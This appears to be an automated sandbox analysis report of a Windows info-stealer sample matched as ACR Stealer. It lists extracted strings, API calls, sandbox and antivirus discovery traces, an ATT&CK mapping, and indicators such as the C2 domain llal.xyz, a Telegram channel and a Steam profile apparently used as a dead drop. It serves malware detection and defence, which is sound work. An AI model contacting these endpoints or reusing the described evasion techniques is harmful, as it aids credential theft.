Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/stats/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: OXoeX1Ii3x.exeString found in binary or memory: https://t.me/asdfghjrrewqqqqtfg
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2

System Summary

Source: OXoeX1Ii3x.exe, type: SAMPLE | Matched rule: Finds ACR Stealer standalone samples based on specific strings. Author: Sekoia.io
Source: 0.2.OXoeX1Ii3x.exe.200000.0.unpack, type: UNPACKEDPE | Matched rule: Finds ACR Stealer standalone samples based on specific strings. Author: Sekoia.io
Source: 0.0.OXoeX1Ii3x.exe.200000.0.unpack, type: UNPACKEDPE | Matched rule: Finds ACR Stealer standalone samples based on specific strings. Author: Sekoia.io
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: String function: 0020A85F appears 68 times
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: String function: 0023FC67 appears 91 times
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: String function: 0021D5B0 appears 52 times
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: String function: 0023FC9A appears 75 times
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1932
Source: OXoeX1Ii3x.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP
Source: OXoeX1Ii3x.exe, type: SAMPLEMatched rule: infostealer_win_acrstealer_str author = Sekoia.io, description = Finds ACR Stealer standalone samples based on specific strings., creation_date = 2024-04-22, classification = TLP:CLEAR, version = 1.0, id = 63b4d6ff-0cab-44ec-9d53-bb2612371a48
Source: 0.2.OXoeX1Ii3x.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_acrstealer_str author = Sekoia.io, description = Finds ACR Stealer standalone samples based on specific strings., creation_date = 2024-04-22, classification = TLP:CLEAR, version = 1.0, id = 63b4d6ff-0cab-44ec-9d53-bb2612371a48
Source: 0.0.OXoeX1Ii3x.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_acrstealer_str author = Sekoia.io, description = Finds ACR Stealer standalone samples based on specific strings., creation_date = 2024-04-22, classification = TLP:CLEAR, version = 1.0, id = 63b4d6ff-0cab-44ec-9d53-bb2612371a48
Source: classification engineClassification label: mal84.troj.winEXE@2/6@2/2
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0021AFE8 __EH_prolog3_GS,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,Sleep,0_2_0021AFE8
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199619938930[1].htmJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4396
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\e14e1b0d-1f70-405f-a4b6-4de6e2cfca0cJump to behavior
Source: OXoeX1Ii3x.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: OXoeX1Ii3x.exeVirustotal: Detection: 52%
Source: OXoeX1Ii3x.exeReversingLabs: Detection: 68%
Source: unknownProcess created: C:\Users\user\Desktop\OXoeX1Ii3x.exe "C:\Users\user\Desktop\OXoeX1Ii3x.exe"
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1932
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: OXoeX1Ii3x.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: OXoeX1Ii3x.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_0023FC35 push ecx; ret 0_2_0023FC48
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 occurrences)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (50 occurrences)
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | API coverage: 3.5 %
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_0023576B FindFirstFileExW
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_00207A82 __EH_prolog3_GS,FindFirstFileA,PathMatchSpecA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,FindClose,FindClose
Source: Amcache.hve.4.dr | Binary or memory string: VMware
Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.4.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@
Source: Amcache.hve.4.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_0021D3D0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_0021C2B7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_002187FB __EH_prolog3_GS,GetProcessHeap,HeapFree,Sleep
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_0021CA6E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_0021D3D0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_0021D535 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_0022B6EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_0021D1DF cpuid
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_002320A9 GetLocaleInfoW
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_00238BF9 GetACP,IsValidCodePage,GetLocaleInfoW
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_00238EA7 EnumSystemLocalesW
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_00238EF2 EnumSystemLocalesW
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_00238F8D EnumSystemLocalesW
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_00239020 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_00239280 GetLocaleInfoW
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_002393A9 GetLocaleInfoW,GetLocaleInfoW,GetACP
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_002394AF GetLocaleInfoW
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_00239585 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_00231B7D EnumSystemLocalesW
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_00224EC6 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_00232B10 GetTimeZoneInformation
Source: Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr | Binary or memory string: MsMpEng.exe
MITRE ATT&CK matrix (one line per tactic; techniques listed in matrix order, with the number of matched signatures in parentheses where the report gives one):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (1); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: System Time Discovery (2); Security Software Discovery (41); Virtualization/Sandbox Evasion (1); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (22)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label
OXoeX1Ii3x.exe | 53% | Virustotal |
OXoeX1Ii3x.exe | 68% | ReversingLabs | Win32.Ransomware.Generic
OXoeX1Ii3x.exe | 100% | Avira | TR/AVI.Ransom.faqrc
OXoeX1Ii3x.exe | 100% | Joe Sandbox ML |

No Antivirus matches

Source | Detection | Scanner | Label
https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d | 0% | Avira URL Cloud | safe
https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842dy | 0% | Avira URL Cloud | safe
https://community.fastly4 | 0% | Avira URL Cloud | safe
https://llal.xyz/ | 0% | Avira URL Cloud | safe
https://llal.xyz | 0% | Avira URL Cloud | safe
https://llal.xyzuser | 0% | Avira URL Cloud | safe
https://api.steampowerW | 0% | Avira URL Cloud | safe
https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d3 | 0% | Avira URL Cloud | safe
https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842db | 0% | Avira URL Cloud | safe
https://https://t.me/asdfghjrrewqqqqtfg/ujs/WorldHellostrwvfncexGostrbrCHbrGkunknownftpac/Up/gltype | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.102.49.254 | true | false | | high
llal.xyz | 188.114.96.3 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d | true | Avira URL Cloud: safe | unknown
https://steamcommunity.com/profiles/76561199619938930 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://player.vimeo.com | OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly4 | OXoeX1Ii3x.exe, 00000000.00000002.2505872324.000000000313A000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://steamcommunity.com/profiles/76561199619938930/inventory/ | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://steamcommunity.com/?subsection=broadcasts | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://store.steampowered.com/subscriber_agreement/ | OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.dr | false | | high
https://www.gstatic.cn/recaptcha/ | OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmp | false | | high
